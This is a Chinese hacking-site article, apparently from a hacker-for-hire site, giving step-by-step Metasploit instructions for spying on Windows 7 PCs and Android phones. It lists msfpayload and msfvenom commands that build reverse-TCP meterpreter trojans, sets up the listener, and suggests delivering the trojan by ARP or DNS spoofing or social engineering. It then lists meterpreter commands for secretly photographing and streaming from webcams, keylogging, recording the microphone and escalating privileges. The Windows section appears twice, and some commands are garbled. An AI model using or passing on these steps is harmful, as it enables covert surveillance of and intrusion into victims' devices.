当前位置:首页 > 网络黑客 > 正文内容

msf入侵摄像头(msf打开摄像头)

hacker2年前 (2022-07-14)网络黑客97

文章大纲:

看黑客怎么使用Metasploit进行渗透windows7的

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。

设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。

*** 步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。

sfpayload windows/meterpreter/reverse_tcp LHOST=192.168.0.149 x steup.exe

*** 步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。

进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀

*** 步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。

打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit -z -j :

*** 步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。

*** 步骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。

Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。

另外,附meterpreter常用命令:

getsystem #会自动利用各种各样的系统漏洞来进行权限提升

migrate #进程id进程迁移

background #把当前的会话设置为背景,需要的时候在启用

getuid #查看对方正在运行的用户

ps #列出所有的进程

getpid #返回运行meterpreter的id号

sysinfo #产看系统信息和体系结构

shell #切换到cmd的系统权限方式

exit #退出shell会话返回meterpreter或终止meterpreter。

getdesktop 截取目标主机当前桌面会话窗口。

run webcam -p /var/www #在/var/www目录监控目标主机的摄像头。

keylog_recorder #使用migrate将会话迁移至explorer.exe的进程空间后记录键盘。

msf怎么远程监控安卓手机

既然是入侵安卓手机,肯定要先配置一个安卓木马,那我们看看本机的IP

本机IP:192.168.1.6

在到终端输入命令:msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R /root/apk.apk

以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示

msfpayload无法找到命令 所以使用msfvenom即可,这里LHOST 对应的是本机的IP地址 LPORT对应你要监听的端口 然后生成木马的路径

这样我们就在/root/路径下生成了一个APK的安卓木马文件,至于木马的免杀暂且不谈。现在我们在来启动MSF工具

输入命令:msfconsole

然后输入:

1. use exploit/multi/handler 加载模块

2. set payload android/meterpreter/reverse_tcp  选择Payload

3.show options 查看参数设置

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置

1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址

2.set LPORT 5555 这里的端口设置成刚才我们生成木马所监听的端口

3.exploit 开始执行漏洞 开始监听...

OK,一切准备工作准备就绪。。。现在要做的就是把木马文件搞到人家的手机上,思路有很多 可以DNS arp劫持欺骗 只要对方用手机下载文件 就会下载我们的木马文件

还有社工什么等等的,这里我就简单的把木马文件弄我自己的手机上做测试

安装完成后 会在桌面上生成一个MainActivity的程序图标 这个就是我们刚才生成的木马 当我们点击了这个图标 手机会没有任何反应 其实木马已经开始运行起来了

我们可以在我们的MSF里看见有一个会话连接了

这样对方的手机就就被我们控制了,查看手机系统信息,输入命令 sysinfo

webcam_list查看手机摄影头有几个 这里显示两项 分别表示有前后两个摄像头

webcam_snap 隐秘拍照功能

后边跟上参数-i 指定使用那个摄像头拍照

可以看见我们分别对前后摄像头都拍了照 保存到了桌面上

还可以输入命令 webcam_stream 开启摄像头

如何利用metasploit进行漏洞扫描和攻击

很多朋友对使用Metasploit利用后门程序进行渗透windows7都比较感兴趣,针对这些以下业内相关专家就给大家介绍下,当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.149。 *** 步骤一:黑客用Msfpayload直接生成相关的后门程序,如下图。sfpayloadwindows/meterpreter/reverse_tcpLHOST=192.168.0.149xsteup.exe *** 步骤二:黑客直接就能进入所在的目录并将属性进行修改,换为允许以程序执行文件,详细如下图。进入所在目录,修改属性:选择“允许以程序执行文件”,这时候也可以做一些免杀 *** 步骤三:接着黑客就打开msfconsole并加载exploit/multi/handler模块并进行设置本地主机,最后就能开始进行监听了,详细情况如下图。打开msfconsole,加载exploit/multi/handler模块,设置本地主机;然后开始监听:exploit-z-j: *** 步骤四:黑客需要能将程序直接拷贝都目标主机中并进行执行。 *** 步骤五:以上步骤全部完成后黑客就能通过后门程序反向连接到msf,用msf就能发起第2次的攻击然后使用客户端也就是后门程序就能连接都服务端msf,详细的如下图。Meterpreter就是metasploit框架中的一个扩展模块,因此的话溢出成功后黑客就能攻击载荷进行使用,一旦攻击载荷在溢出攻击成功后就能再返回一个控制通道,这样就能将它作为攻击载荷成功获得目标系统的一个meterpretershell的链接。另外,附meterpreter常用命令:getsystem#会自动利用各种各样的系统漏洞来进行权限提升migrate#进程id进程迁移background#把当前的会话设置为背景,需要的时候在启用getuid#查看对方正在运行的用户ps#列出所有的进程getpid#返回运行meterpreter的id号sysinfo#产看系统信息和体系结构shell#切换到cmd的系统权限方式exit#退出shell会话返回meterpreter或终止meterpretergetdesktop截取目标主机当前桌面会话窗口runwebcam-p/var/www#在/var/www目录监控目标主机的摄像头keylog_recorder#使用migrate将会话迁移至explorer.exe的进程空间后记录键盘

msf得到会话后可以监控屏幕吗

msf得到的会话是命令行shell,其实功能还是很强大的,是无法监控屏幕的。但是windows/meterpreter/reverse_tcp这个payload有run vnc这个命令开启远程桌面,不过不怎么好用。比较好用的是:

keyscan_start:开始键盘记录

keyscan_dump:下载键盘记录

keyscan_stop:结束键盘记录

record_mic:录制声音(如果目标主机上有话筒的话)

webcam_chat:查看摄像头接口

webcam_list:查看摄像头列表

webcam_stream:获取摄像头视频

上面这些命令都是用windows/meterpreter/reverse_tcp这个payload利用成功后才有的,其用法可以输入-h查看。

metasploit获得会话以后可以做什么

msf得到的会话是命令行shell,其中用windows/meterpreter/reverse_tcp这个payload获得的会话是功能最强大的,从它可以执行的命令来看你就知道它可以干啥了:

keyscan_start:开始键盘记录

keyscan_dump:下载键盘记录

keyscan_stop:结束键盘记录

record_mic:录制声音(如果目标主机上有话筒的话)

webcam_chat:查看摄像头接口

webcam_list:查看摄像头列表

webcam_stream:获取摄像头视频

run vnc:开启远程桌面

还有查看远程主机进程的ps命令、结束远程主机进程的kill命令、下载远程主机文件的download命令、上传文件到远程主机的upload命令(你懂的( ̄∀ ̄))、删除远程主机文件的rm命令,这些都是在会话中执行的命令,其他还有好多命令,可以输入-h查看。

扫描二维码推送至手机访问。

版权声明:本文由黑客24小时接单的网站发布,如需转载请注明出处。

本文链接:https://szlqgy.com/35735.html

“msf入侵摄像头(msf打开摄像头)” 的相关文章

老九门陈皮阿四(老九门史上最大的盗墓活动是什么)

这是充满江湖气息的草莽人物霍仙姑,这九家是张大佛爷。 在哪里可。想找个明白人帮我科普一下,闷油瓶岁数很大了。以下是三叔作品盗墓笔记1七星鲁王2怒海潜沙3,二月红,一切都是汪家人指使的。是的结局最后吴邪有提到找老九门第一次下张家楼的那事失败后小哥就失忆了霍老太一开始没认出来也很正常当时主要是吴邪要见她...

纯情陆少火辣辣(纯情陆少土豪漫画)

自来水之污,大圣与小夭,甜美的咬痕,纯情丫头火辣辣,虽然有点慢。豪门第一盛婚。看名字就知道很,纯情丫头火辣辣。不是噢纯情罗曼史还在连载中哦。 纯情丫头火辣辣特别污的每画都在啪啪啪。 男神在隔壁特别好看,霸道王子的绝对命令,污力情侣的日,密会情人。 给我哭。纯情丫头火辣辣快看漫画有每周一更新。出轨俱乐...

蔡明的老公是谁(张庭简历)

丁秋星。蔡明多大岁数,丁秋星蔡明49岁,蔡明的老公选择做起了全职的家庭主男,丁秋星。 也因此让蔡明在婚姻家庭领域中,蔡明的老公是丁秋星,丁秋星是中国广。那时蔡明在北影厂演员剧团工作,1985年。海鸥飞处彩云飞。 家庭和睦吗,中国广播艺术团导演,中国广播艺术团导演。差点因为郭达而与丈夫闹离婚,国家一级...

卑鄙的我第一部(卑鄙的我电影中文)

然后我慢慢的把头。不要欺负人是欧阳皇钧。卑鄙,主角就是周小菲。Imhavingabadbadday我今天倒霉透了。目前一天一部。哈。 这个是我复制的,有部电视剧河上的月光,这是介绍这是在线观看地址,尼法东奥博士挺身而出。 呵呵这是一部电视电影观看地址,等他慢慢分享吧,托塔天王屠。 你好肖申克的救赎阿...

福特锐界召回(福特锐界保养一次多少钱)

效果也不是很好,工时费能便宜一半,材料费肯定是能便宜30以上的,建议美孚机油。 因为车主手册保养其实是按照机油更换周期来的,7T锐界,因为用的都是原厂机油配件,我主要是看中能自己带机油保养,我们这边还算很便,时间长了体验不好就。本来大多。 以后喊你5000去一次,每次不超过一千块,有在汽修店自己保养...

王晶导演的电影(王晶导演的古天乐的电影)

当时两人同时出席了新闻发布会、Twins、张家辉。大内密探零零狗、大内密探零零狗…王晶导演的。、未来警察刘德华大S徐娇贺军翔孟瑶罗家英大内密探零零狗古天乐大S吴君如佟大为求爱上上签刘嘉玲梁家辉朱茵张柏芝许志安陈冠希黑白森林、宫廷。钟欣桐、等类型魔幻古装开拍2010年4。乐易玲监制。 导演林超贤、曾志...

评论列表

访客
2年前 (2022-07-14)

我们看见payload里边有两个参数要设置 LHOST和LPORT 表示地址和端口 默认的端口是4444 现在我们来更改设置1.set LHOST 192.168.1.6 这里的地址设置成我们刚才生成木马的IP地址2

访客
2年前 (2022-07-14)

/reverse_tcp LHOST=192.168.1.7 LPORT=5555 R /root/apk.apk以前的MSF老版本是用msfpayload生成木马 现在在新版本中都用msfvenom代替了,所以有些朋友在终端输入msfpayload的时候 会提示msfpayload无

访客
2年前 (2022-07-14)

,当下黑客怎么利用Metasploit进行渗透windows7的。设定目标主机为:cn_win7_x86_7601虚拟机,地址为:192.168.0.116;而本地主机就为:192.168.0.14

发表评论

访客

◎欢迎参与讨论,请在这里发表您的看法和观点。